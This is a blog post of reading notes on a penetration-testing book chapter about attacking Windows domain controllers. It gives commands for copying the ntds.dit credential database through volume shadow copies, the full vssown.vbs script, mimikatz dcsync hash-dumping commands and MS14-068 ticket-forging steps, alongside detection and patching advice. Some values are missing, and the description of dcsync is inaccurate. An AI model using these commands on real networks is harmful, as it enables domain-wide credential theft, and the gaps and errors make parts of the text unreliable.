
Reading Notes on 《内网安全攻防:渗透测试实战指南》 (6): Domain Controller Security

Date: 2018-09-03 19:24:15


Contents

Preface
1. Extracting ntds.dit with the Volume Shadow Copy Service
   1.1 ntdsutil.exe
   1.2 vssadmin
   1.3 vssown.vbs
   1.4 ntdsutil IFM
   1.5 diskshadow
   1.6 Defences
2. Exporting hashes from ntds.dit
3. Obtaining domain hashes with dcsync
4. Other ways of obtaining domain hashes
   4.1 Metasploit
   4.2 vshadow.exe and QuarkPwDump.exe
5. Kerberos domain user privilege escalation vulnerability
Conclusion

Preface

This post continues my reading of 《内网安全攻防:渗透测试实战指南》. This chapter is on domain controller security: it introduces Kerberos domain user privilege escalation and the methods for exporting hashes from ntds.dit, and gives effective security recommendations against attacks on domain controllers.

In a real network environment, the attacker's ultimate goal when penetrating the intranet is to obtain domain controller privileges and thereby control the entire domain.

1. Extracting ntds.dit with the Volume Shadow Copy Service

In Active Directory, all data is stored in the ntds.dit file.

ntds.dit is a binary file stored on the DC at C:\Windows\NTDS\ntds.dit. It contains all the information in the domain; by analysing ntds.dit, the computer information and other information in the domain can be exported. Like the SAM file, it is locked by the system.

The Volume Shadow Copy Service (VSS) can be used to extract ntds.dit. VSS is essentially a snapshot technology used mainly for backup and recovery, and it works even when the target file is locked.

1.1 ntdsutil.exe

A command-line tool that provides the management mechanism for AD; supported on Windows Server.

//create a snapshot
ntdsutil snapshot "activate instance ntds" create quit quit
//mount the snapshot
ntdsutil snapshot "mount <GUID>" quit quit
//copy ntds.dit out of the snapshot
copy <location of the mounted snapshot> c:\tmp\ntds.dit
//delete the snapshot
ntdsutil snapshot "unmount <GUID>" "delete <GUID>" quit quit

1.2 vssadmin

The VSS management tool shipped with Windows 7 and Windows Server.

//create a shadow copy of the C: drive
vssadmin create shadow /for=c:
//copy ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\NTDS\ntds.dit c:\ntds.dit
//delete the shadow copy
vssadmin delete shadow /for=c: /quiet

1.3 vssown.vbs

A script developed by Tim Tomes with functionality similar to vssadmin.

The script is as follows:

REM Volume Shadow Copy Management from CLI.
REM Part of the presentation "Lurking in the Shadows" by Mark Baggett and Tim "LaNMaSteR53" Tomes.
REM Co-developed by Mark Baggett (@MarkBaggett) and Tim Tomes (@lanmaster53).

Set args = WScript.Arguments

if args.Count < 1 Then
  wscript.Echo "Usage: cscript vssown.vbs [option]"
  wscript.Echo
  wscript.Echo " Options:"
  wscript.Echo
  wscript.Echo " /list - List current volume shadow copies."
  wscript.Echo " /start - Start the shadow copy service."
  wscript.Echo " /stop - Halt the shadow copy service."
  wscript.Echo " /status - Show status of shadow copy service."
  wscript.Echo " /mode - Display the shadow copy service start mode."
  wscript.Echo " /mode [Manual|Automatic|Disabled] - Change the shadow copy service start mode."
  wscript.Echo " /create [drive_letter] - Create a shadow copy."
  wscript.Echo " /delete [id|*] - Delete a specified or all shadow copies."
  wscript.Echo " /mount [path] [device_object] - Mount a shadow copy to the given path."
  wscript.Echo " /execute [\path\to\file] - Launch executable from within an umounted shadow copy."
  wscript.Echo " /store - Display storage statistics."
  wscript.Echo " /size [bytes] - Set drive space reserved for shadow copies."
  REM build_off
  wscript.Echo " /build [filename] - Print pasteable script to stdout."
  REM no_build
  REM build_on
  wscript.Quit(0)
End If

strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Select Case args.Item(0)

  Case "/list"
    Wscript.Echo "SHADOW COPIES"
    Wscript.Echo "============="
    Wscript.Echo
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
    For Each objItem in colItems
      Wscript.Echo "[*] ID: " & objItem.ID
      Wscript.Echo "[*] Client accessible: " & objItem.ClientAccessible
      Wscript.Echo "[*] Count: " & objItem.Count
      Wscript.Echo "[*] Device object: " & objItem.DeviceObject
      Wscript.Echo "[*] Differential: " & objItem.Differential
      Wscript.Echo "[*] Exposed locally: " & objItem.ExposedLocally
      Wscript.Echo "[*] Exposed name: " & objItem.ExposedName
      Wscript.Echo "[*] Exposed remotely: " & objItem.ExposedRemotely
      Wscript.Echo "[*] Hardware assisted: " & objItem.HardwareAssisted
      Wscript.Echo "[*] Imported: " & objItem.Imported
      Wscript.Echo "[*] No auto release: " & objItem.NoAutoRelease
      Wscript.Echo "[*] Not surfaced: " & objItem.NotSurfaced
      Wscript.Echo "[*] No writers: " & objItem.NoWriters
      Wscript.Echo "[*] Originating machine: " & objItem.OriginatingMachine
      Wscript.Echo "[*] Persistent: " & objItem.Persistent
      Wscript.Echo "[*] Plex: " & objItem.Plex
      Wscript.Echo "[*] Provider ID: " & objItem.ProviderID
      Wscript.Echo "[*] Service machine: " & objItem.ServiceMachine
      Wscript.Echo "[*] Set ID: " & objItem.SetID
      Wscript.Echo "[*] State: " & objItem.State
      Wscript.Echo "[*] Transportable: " & objItem.Transportable
      Wscript.Echo "[*] Volume name: " & objItem.VolumeName
      Wscript.Echo
    Next
    wscript.Quit(0)

  Case "/start"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      objService.StartService()
      Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
    Next
    wscript.Quit(0)

  Case "/stop"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      objService.StopService()
      Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
    Next
    wscript.Quit(0)

  Case "/status"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      Wscript.Echo "[*] " & objService.State
    Next
    wscript.Quit(0)

  Case "/mode"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      if args.Count < 2 Then
        Wscript.Echo "[*] " & objService.Name & " service set to '" & objService.StartMode & "' start mode."
      Else
        mode = LCase(args.Item(1))
        if mode = "manual" or mode = "automatic" or mode = "disabled" Then
          errResult = objService.ChangeStartMode(mode)
          Wscript.Echo "[*] " & objService.Name & " service set to '" & mode & "' start mode."
        Else
          Wscript.Echo "[*] '" & mode & "' is not a valid start mode."
        End If
      END If
    Next
    wscript.Quit(errResult)

  Case "/create"
    VOLUME = args.Item(1) & ":\"
    Const CONTEXT = "ClientAccessible"
    Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
    Wscript.Echo "[*] Attempting to create a shadow copy."
    errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
    wscript.Quit(errResult)

  Case "/delete"
    id = args.Item(1)
    Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
    For Each objItem in colItems
      if objItem.ID = id Then
        Wscript.Echo "[*] Attempting to delete shadow copy with ID: " & id
        errResult = objItem.Delete_
      ElseIf id = "*" Then
        Wscript.Echo "[*] Attempting to delete shadow copy " & objItem.DeviceObject & "."
        errResult = objItem.Delete_
      End If
    Next
    wscript.Quit(errResult)

  Case "/mount"
    Set WshShell = WScript.CreateObject("WScript.Shell")
    link = args.Item(1)
    sc = args.Item(2) & "\"
    cmd = "cmd /C mklink /D " & link & " " & sc
    WshShell.Run cmd, 2, true
    Wscript.Echo "[*] " & sc & " has been mounted to " & link & "."
    wscript.Quit(0)

  Case "/execute"
    file = args.Item(1)
    Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
    Set objProcess = objWMIService.Get("Win32_Process")
    For Each objItem in colItems
      path = Replace(objItem.DeviceObject,"?",".") & file
      intReturn = objProcess.Create(path)
      if intReturn <> 0 Then
        wscript.Echo "[*] Process could not be created from " & path & "."
        wscript.Echo "[*] ReturnValue = " & intReturn
      Else
        wscript.Echo "[!] Process created from " & path & "."
        wscript.Quit(0)
      End If
    Next
    wscript.Quit(0)

  Case "/store"
    Wscript.Echo "SHADOW STORAGE"
    Wscript.Echo "=============="
    Wscript.Echo
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
    For Each objItem in colItems
      Wscript.Echo "[*] Allocated space: " & FormatNumber(objItem.AllocatedSpace / 1000000,0) & "MB"
      Wscript.Echo "[*] Maximum size: " & FormatNumber(objItem.MaxSpace / 1000000,0) & "MB"
      Wscript.Echo "[*] Used space: " & FormatNumber(objItem.UsedSpace / 1000000,0) & "MB"
      Wscript.Echo
    Next
    wscript.Quit(0)

  Case "/size"
    storagesize = CDbl(args.Item(1))
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
    For Each objItem in colItems
      objItem.MaxSpace = storagesize
      objItem.Put_
    Next
    Wscript.Echo "[*] Shadow storage space has been set to " & FormatNumber(storagesize / 1000000,0) & "MB."
    wscript.Quit(0)

  REM build_off
  Case "/build"
    build = 1
    Const ForReading = 1
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objTextFile = objFSO.OpenTextFile("vssown.vbs", ForReading)
    Do Until objTextFile.AtEndOfStream
      strNextLine = objTextFile.Readline
      if InStr(strNextLine,"REM build_off") = 3 Then
        build = 0
      End If
      if strNextLine <> "" and build = 1 Then
        strNextLine = Replace(strNextLine,"&","^&")
        strNextLine = Replace(strNextLine,">","^>")
        strNextLine = Replace(strNextLine,"<","^<")
        wscript.Echo "echo " & strNextLine & " >> " & args.Item(1)
      End If
      if InStr(strNextLine,"REM build_on") = 3 Then
        build = 1
      End If
    Loop
    wscript.Quit(0)
  REM build_on

End Select

1.4 ntdsutil IFM

When ntdsutil is used to create an IFM (Install From Media) set, it generates a snapshot, mounts it, and copies ntds.dit and the machine's SAM file into the target folder:

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

ntds.dit is then copied to c:\test\Active Directory

SYSTEM and SECURITY are copied to c:\test\registry\

Nishang contains a script, Copy-VSS.ps1, that implements the whole process.

1.5 diskshadow

diskshadow.exe can use VSS and export ntds.dit.

It is released by Microsoft and its code is signed by Microsoft; it ships by default with Windows Server. When using it to export ntds.dit, it must be run from within C:\Windows\system32.

After exporting ntds.dit, reg can be used to dump system.hive, because system.hive holds the key for ntds.dit; without that key the information in ntds.dit cannot be read.

In a penetration test, the text file containing the commands to execute should first be written to the remote target system, and diskshadow.exe is then used to invoke and execute that file, which is more flexible. The text is as follows:

//set the shadow copy context
set context persistent nowriters
//add the volume
add volume c: alias someAlias
//create the snapshot
create
//assign a virtual drive letter
expose %someAlias% k:
//copy ntds.dit
exec "cmd.exe" /c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit
//list the shadow copies
list shadows all
//reset
reset
//exit
exit

1.6 Defences

By monitoring use of the Volume Shadow Copy Service, malicious operations performed by an attacker on a system can be discovered in time:

- Monitor the Volume Shadow Copy Service and any suspicious operations involving the Active Directory database file (ntds.dit)
- Monitor suspicious instances of System Event ID 7036 (the sign that the Volume Shadow Copy Service has entered the running state), and events that create the vssvc.exe process
- Monitor events that create diskshadow.exe and its related child processes
- Monitor diskshadow.exe instance creation events on client devices (unless the business requires it, diskshadow.exe should not appear on Windows client systems)
- Use logs to monitor newly appearing logical drive mapping events

2. Exporting hashes from ntds.dit

Several tools that can be used:

- libyal/libesedb
- csababarta/ntdsxtract
- zcgonvh/NTDSDumpEx

3. Obtaining domain hashes with dcsync

mimikatz has a dcsync feature which can use the Volume Shadow Copy Service (VSS) to read ntds.dit directly and retrieve the domain hashes; it requires domain administrator privileges.

//export all usernames and hashes in the domain
lsadump::dcsync /domain: /all /csv
//export the hash of the specified user Dm
lsadump::dcsync /domain: /User:Dm
//dump the lsass.exe process to extract hashes
privilege::debug
lsadump::lsa /inject

mimikatz produces too much output to display in full, so the log command can be run first (it creates a text file in the current directory that records all of mimikatz's output).

4. Other ways of obtaining domain hashes

4.1 Metasploit

use auxiliary/admin/smb/psexec_ntdsgrab

4.2 vshadow.exe and QuarkPwDump.exe

QuarkPwDump can read all domain accounts and domain hashes quickly, safely and comprehensively.

Download: /quarkslab/quarkspwdump

5. Kerberos domain user privilege escalation vulnerability

Kerberos domain user privilege escalation vulnerability (MS14-068, CVE--6324, KB3011780)

Windows R2 and all earlier versions are affected. If an attacker has obtained shell access on any computer in the domain and knows the username, SID and password of any domain user, they can obtain domain administrator privileges, then control the DC, and finally obtain control of the domain.

General ticket injection process:

1. Check the DC's patch status (systeminfo, WMIC qfe)
2. Check the user's SID (whoami /user)
3. Generate a high-privilege ticket (ms14-068.exe)
4. Check privileges before injection (dir \\DC\c$)
5. Clear all tickets in memory (mimikatz, kerberos::purge)
6. Inject the high-privilege ticket into memory (kerberos::ptc)
7. Verify privileges

Some tools:

- PyKEK: /mubix/pykek
- goldenPac.py in impacket
- ms14_068_kerberos_checksum in Metasploit

Remediation advice:

- Enable Windows Update, or install the patch manually
- Control domain accounts: prohibit weak passwords, and change passwords promptly and regularly
- Install anti-virus software and keep its signature database up to date

Conclusion

This chapter mainly revolves around obtaining ntds.dit.
